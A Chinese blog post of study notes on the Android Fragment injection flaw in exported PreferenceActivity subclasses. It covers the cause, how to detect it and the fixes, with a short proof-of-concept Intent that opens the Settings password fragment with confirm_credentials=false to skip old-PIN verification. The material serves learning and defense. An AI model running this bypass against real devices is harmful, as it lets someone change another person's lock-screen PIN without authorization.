移动安全学习笔记——fragment注入

最新推荐文章于 2022-08-09 09:23:14 发布
最新推荐文章于 2022-08-09 09:23:14 发布
阅读量405 收藏 1
点赞数
分类专栏: # 移动安全 文章标签: android 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/syy0201/article/details/115057633
版权
1、漏洞原理
  • 攻击原理:导出PreferenceActivity的子类中,没有加入isValidFragment方法,进行fragment名的合法性校验,攻击者可能会通过设置Intentextra,实现动态修改PreferenceActivity的初次显示的Fragment,来绕过限制,访问未授权的界面。
  • 攻击条件:Android4.3及之前版本
2、相关知识

  • PreferenceActivity两个重要的Intent Extra

    这两个参数可以决定当前的PreferenceActivity首次显示的Fragment。

    • extra域包含PreferenceActivity要动态加载的Fragment

      EXTRA_SHOW_FRAGMENT=":android:show_fragment"

    • extra域包含传给该Fragment的参数

      EXTRA_SHOW_FRAGMENT_ARGUMENTS=":android:show_fragment_args"

  • Fragment与Activity的关系

    • 一个activity提供一个单一的屏幕和一些功能,一个activity可以包含多个fragment
    • fragment可以在不同的activities中重用
3、检测方法

先反编译,检索到继承PreferenceActivity的子类,查看子类是否重写了isValidFragment方法,Activity是否对外暴露(exported)。

4、漏洞危害

绕过限制,访问未授权页面。

【漏洞示例1——Setting Fragment Inject漏洞:绕过旧密码验证修改密码】

Setting几乎每个Android设备都有的。Setting是以system_uid方式签名,所以具备行使system的权力。它的主界面com.android.settings.Settings就是继承自PreferenceActivity,而且肯定是exported。比如说ChooseLockPassword$ChooseLockPasswordFragment这个Fragment,这个类主要是负责锁屏界面的密码设定和修改。同时,这个类会根据之前传入的initialArguments做不同的逻辑,关键代码如下所示:

	Intent intent = getActivity().getIntent();
	final boolean confirmCredentials = intent.getBooleanExtra("confirm_credentials", true);
	if (savedInstanceState == null) {
		updateStage(Stage.Introduction);
		if (confirmCredentials) {
			mChooseLockSettingsHelper.launchConfirmationActivity(CONFIRM_EXISTING_REQUEST,null, null);
		}
	} else {
		mFirstPin = savedInstanceState.getString(KEY_FIRST_PIN);
		final String state = savedInstanceState.getString(KEY_UI_STAGE);
		if (state != null) {
			mUiStage = Stage.valueOf(state);
			updateStage(mUiStage);
		}
	}

如果传入的参数当中,key为"confirm_credentials"为true,就会调起旧密码验证的流程。如果为false,就可以跳过旧密码验证而直接进入密码修改的流程。测试代码如下所示:

	Intent intent = new Intent();
	intent.setFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK);
	intent.setClassName("com.android.settings", "com.android.settings.Settings");
	intent.putExtra(":android:show_fragment", "com.android.settings.ChooseLockPassword$ChooseLockPasswordFragment");
	intent.putExtra("confirm_credentials", false);
	startActivity(intent);

正常的密码修改流程是"设置"->“安全”->“屏幕锁定”->“确认你的PIN”,现在可以跳过“确认你的PIN”直接进入“选择你的PIN”页面。

5、修复方案
  • 1-如果应用的Activity组件不必要导出,或者组件配置了intent filter标签,建议显示设置组件的“android:exported”属性为false
  • 重写继承子类的isValidFragment方法,验证Fragment来源的正确性。
0nc3
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[车联网安全自学篇] Android安全Android Fragment注入
橙留香Park的博客
05-30 330
为了适应越来越大的设备屏幕,Android 3.X后引入了Fragment概念,作用是可以在一个屏幕上同时显示多个Activity,以达到充分利用屏幕的目的。其中,Fragment有一个很强大的功能,就是可以动态加载。这样可以让整个界面的开发更加灵活,可以根据不同的场景动态加加载不同的Activity。...
Fragment注入漏洞(CVE-2013-6271)检测
编程小栈
07-22 754
(1)描述 在api level 小于19的app,所有继承了PreferenceActivity类的activity并将该类置为exported的应用都受到Fragment注入漏洞的威胁。 Google在 Android 4.4 KitKat 里面修正了该问题,引入了PreferenceActivity.isValidFragment函数,要求用户重写该函数验证Fragment来源正确性。 (2...
Android框架攻击之Fragment注入
热门推荐
简行之旅
12-12 2万+
为了适应越来越大的设备屏幕,Android在3.X后引入了Fragment概念,作用是可以在一个屏幕上同时显示多个Activity,以达到充分利用屏幕的目的。关于Fragment的使用说明,可以阅读《Android Fragment完全解析,关于碎片你所需知道的一切》。其中,Fragment有一个很强大的功能,就是可以动态加载。这样可以让整个界面的开发更加灵活,可以根据不同的场景动态加加载不同的Activity。 回到今天的主题——利用Fragment实现注入攻击。从3.X后,android
[免费专栏] Android安全Android Fragment注入
最新发布
橙留香Park的博客
08-09 946
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ...
fragment注入
github_38641765的博客
09-04 208
原理 PreferenceActivity类中有一个静态变量 EXTRA_SHOW_FRAGMENT /** * When starting this activity, the invoking Intent can contain this extra * string to specify which fragment s...
Android学习笔记——Menu介绍(二)
01-04
这次将继续上一篇文章没有讲完的Menu的学习,上下文菜单(Context menu)和弹出菜单(Popup menu)。 上下文菜单 上下文菜单提供对UI界面上的特定项或上下文框架的操作,就如同Windows中右键菜单一样。 在Android中,有...
Android——Fragment的使用(上)
01-03
Fragment不能脱离activity存在,Fragment是activity的一个组成元素,一个activity可以拥有多个Fragment Fragment的生命周期直接受所在的activity的影响 二、Fragment的生命周期 onAttach:当Fragment与Activity...
Android Studio —— fragment
01-23
1. **创建Fragment**: 可以通过继承Fragment类或支持库中的Fragment(如androidx.fragment.app.Fragment)来创建一个新的Fragment。在Fragment类中,你需要重写onCreateView()方法来提供Fragment的UI布局。 2. **...
安卓Android源码——Fragment例子.zip
10-11
本资料“安卓Android源码——Fragment例子.zip”提供了关于Fragment的实战示例,帮助开发者深入理解其工作原理和用法。下面我们将详细探讨Fragment的基本概念、生命周期以及如何在实际应用中使用。 Fragment最早在...
最新!!!安卓开发——Fragment应用实战
01-05
基于新包 androidx.fragment.app.Fragment androidx.fragment.app.FragmentManager androidx.fragment.app.FragmentTransaction 一个帮助你学习fragment的练手项目
Android Fragment注入漏洞
pxb1988的专栏
12-12 5020
Android Fragment注入漏洞 by Bob Pan 最近IBM的工程师发现了一个android框架层的注入漏洞, 利用这个漏洞可以让攻击者者执行特定代码或者绕过某些安全检查. 漏洞形成原因 Android框架支持在Activity中以Fragment的形式展示界面. 而PreferenceActivity是一个支持Fragment的基类activit
AndroidAnnotations——Injecting FragmentArg注入Fragment参数
博不如精
12-06 2813
FragmentArg Since AndroidAnnotations 2.7 @FragmentArg The @FragmentArg annotation indicates that a fragment field should be injected with the corresponding Fragment Argument
Android 学习记录】Fragment注入漏洞
卦星的专栏
12-25 765
1 概述 这个月太忙,生活工作事情都是到了年关,好几个周末都无休了。想了半天不知道写啥,前段时间翻阅乌云的历史遗迹,对于这类注入问题,感觉应该加深一下印象,因此,在高铁上就拿这篇文章大部分都是转载 + 自我总结进行凑数了 参考文章 Fragment Injection漏洞杂谈 – 路人甲 Android框架攻击之Fragment注入 Android静态安全检测 -> Fragment注入攻击...
Android静态安全检测 -> Fragment注入攻击漏洞
4lwin博客
11-22 3355
Fragment注入攻击漏洞 - PreferenceActivity类 一、API 1. 继承关系 【1】java.lang.Object 【2】android.content.Context 【3】android.content.ContextWrapper 【4】android.view.ContextThemeWrapper 【5】android.a
移动安全入门指南
ruglcc's blog
03-06 1474
声明:原创文章,转载请备注来源:https://shuwoom.com/?p=893 以前花了将近一年多的时间学习移动安全,期间也遇到了各种坑,特别是学习Android加固的知识,由于Android加固技术门槛比较高,在网上想要找到系统的资料还是很困难的,一些相关的入门资料也比较少。在这里,我也把自己以前学习的经历和遇到的坑做一些总结,希望能给一些刚入门移动安全行业的同学一些参考,避免入坑。 ...
Android 系统设置页面注入Fragment的注意事项
scnuxisan225的专栏
04-24 1639
关于Android Fragment注入,请看这两个链接了解下: http://www.cnblogs.com/Lefter/p/3451853.html http://securityintelligence.com/new-vulnerability-android-framework-fragment-injection 如果你也想在系统的设置Settings页面注入你想要展示的Fragme
Android框架层漏洞-Fragment注入
Mikes的专栏
03-13 2928
谷歌在Android 4.4KitKat中提供的补丁添加了一个新的保护API,PreferenceActivity.isValidFragment,通过PreferenceActivity调用之前的动态实例Fragment (见图9)。这个isValidFragment方法必须覆写,否则默认实例将抛出异常,详情参考SDK Reference。我们希望开发人员正确地实现这个方法(例如white-li
FragmentFactory + Koin 实现Fragment依赖注入
移动端开发干货分享
07-26 899
FragmentFactory 允许开发者使用带参数的构造函数创建 Fragment, 能够在 dagger、koin 等DI 框架的使用场景中发挥作用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值